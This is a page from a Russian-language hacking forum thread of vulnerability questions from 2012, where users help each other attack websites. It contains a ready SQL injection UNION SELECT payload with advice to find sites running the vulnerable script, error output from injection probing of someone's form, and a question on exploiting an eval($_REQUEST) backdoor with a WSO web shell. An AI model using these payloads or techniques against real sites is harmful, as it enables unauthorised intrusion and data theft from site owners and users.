HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2167 из 2438 « Первая < 11671667206721172157 2163 2164 2165 2166 2167 2168 2169 2170 2171 217722172267 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #21661  
Старый 18.11.2012, 01:12
seozone
Guest
Сообщений: n/a
Провел на форуме:
10928

Репутация: 0
По умолчанию
Цитата:
Сообщение от Prosta4ok  
Prosta4ok said:
конкретизируй свой вопрос.. там много разных сплоитов, на разных языках
например, http://www.exploit-db.com/exploits/22766/
 
Ответить с цитированием

  #21662  
Старый 18.11.2012, 01:14
Prosta4ok
Guest
Сообщений: n/a
Провел на форуме:
19438

Репутация: 0
По умолчанию
Цитата:
Сообщение от seozone  
seozone said:
например, http://www.exploit-db.com/exploits/22766/
там просто SQLi через GET запрос и перечислены уязвимые переменные
 
Ответить с цитированием

  #21663  
Старый 18.11.2012, 01:20
seozone
Guest
Сообщений: n/a
Провел на форуме:
10928

Репутация: 0
По умолчанию
Цитата:
Сообщение от Prosta4ok  
Prosta4ok said:
там просто SQLi через GET запрос и перечислены уязвимые переменные
покажи пример в пм)
 
Ответить с цитированием

  #21664  
Старый 18.11.2012, 01:22
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию
Цитата:
Сообщение от Konqi  
Konqi said:
ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать
читаем статью нолика. несколько раз.
можно линк? не могу найти...
 
Ответить с цитированием

  #21665  
Старый 18.11.2012, 01:27
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию
Есть форма добавления объявления. Вставляю кавычку в пост запрос и получаю.

Цитата:
Сообщение от None  
item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0', '25', '0', '25', '123', '0')' at line 16
если делаю так '+order+by+2+--+ пишет -

Цитата:
Сообщение от None  
item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+2+--+', '0', '25', '0', '25', '123', '0')' at line 16
Пробовал без кавычки определить кол-во полей, но Проблема в том, что после пост запроса подгружается другая страница, которая возникает при правильном запросе.

Что попробовать, как быть?

p.s. Корыстных целей не преследую, ресурс закрытый и направленности совсем не интересная широкой публике. Бага будет сдана сразу админу.
 
Ответить с цитированием

  #21666  
Старый 18.11.2012, 01:36
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
justonline, inj в insert, свои методы.

/thread35207.html
 
Ответить с цитированием

  #21667  
Старый 18.11.2012, 01:51
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию
Цитата:
Сообщение от VY_CMa  
VY_CMa said:
justonline
, inj в insert, свои методы.
/thread35207.html
точно) что-то мой пияный моск не сообразил, что тут запись а не select)
 
Ответить с цитированием

  #21668  
Старый 18.11.2012, 01:55
Prosta4ok
Guest
Сообщений: n/a
Провел на форуме:
19438

Репутация: 0
По умолчанию
Цитата:
Сообщение от seozone  
seozone said:
покажи пример в пм)
так там все расписано, какой еще пример?

ищешь сайт с уязыимым скрптом, подставляешь

Код:
Code:
сайт/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--
если показывает версию БД знач все пучком и можно крутить скулю дальше
 
Ответить с цитированием

  #21669  
Старый 18.11.2012, 02:30
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию
Цитата:
Сообщение от VY_CMa  
VY_CMa said:
justonline
, inj в insert, свои методы.
/thread35207.html
Цитата:
Сообщение от None  
Select * from dle_users where user_id = 292+order+by+1+--+2 Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--+' at line 1
из той же оперы? опять пост, но вот смущает Select, правда почему, интересно он выводится в ошибке...
 
Ответить с цитированием

  #21670  
Старый 18.11.2012, 17:32
Alert
Guest
Сообщений: n/a
Провел на форуме:
1149

Репутация: 0
По умолчанию
Вопрос, как эксплуатировать бекдор eval ($_REQUEST['a']); ?

Попробовал на локалхосте выполнить http://localhost/test.php?a=http://test1/wso2_pack.php

выдает ошибку

Цитата:
Сообщение от None  
Parse error: syntax error, unexpected ':' in .....\localhost\test.php(15) : eval()'d code on line 1
соответственно бекдор прописан на 15 строчке
 
Ответить с цитированием
Ответ
Страница 2167 из 2438 « Первая < 11671667206721172157 2163 2164 2165 2166 2167 2168 2169 2170 2171 217722172267 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ